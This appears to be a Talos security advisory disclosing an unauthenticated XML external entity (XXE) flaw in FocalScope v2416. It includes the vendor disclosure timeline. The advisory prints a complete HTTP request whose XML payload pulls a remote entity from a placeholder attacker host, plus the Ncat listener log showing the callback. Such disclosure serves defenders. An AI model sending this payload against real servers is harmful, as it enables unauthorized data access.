Talos Vulnerability Report


FocalScope XML External Entity Injection Vulnerability

July 20, 2018
CVE Number



An exploitable unauthenticated XML external injection vulnerability was identified in FocalScope v2416. A unauthenticated attacker could submit a specially crafted web request to FocalScope’s server that could cause an XXE, and potentially result in data compromise.

Tested Versions

FocalScope v2416

Product URLs


CVSSv3 Score

9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H


CWE-611: Improper Restriction of XML External Entity Reference (‘XXE’)


FocalScope v2416 and prior is vulnerable to an unauthenticated XML External Entity injection attack. The following XML payload was used to trigger the XXE:

POST /emm/_cros_/xlogin.asp HTTP/1.1
Host: [IP]
Content-Length: 315
Origin: http://[IP]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Accept: /
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

	<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"> %remote;%int;%trick;]><body><o i='msg'><s i='_url'>url:xlogin.asp</s><s i='_fnc'>GetSalt</s><o i='oParam'><s i='sUser'>PCSL</s><s i='sMyName'>self</s><s i='sCallback'>PutSalt</s></o></o></body>

	On the attacking Server the following request can be observed: 
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.0
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: x.x.x.x
Connection: Keep-Alive

Note: It was also observed that pretty much any page which takes XML input in POST request is vulnerable to this vulnerability, regardless of whether pages are protected by authentication or not.


2018-04-09 - Vendor Disclosure
2018-04-12 - Sent plain text file to vendor
2018-06-05 - 60 day follow up
2018-06-27 - Final follow up
2018-07-20 - Public Release


Discovered by Jerzy (Yuri) Kramarz of Security Advisory EMEAR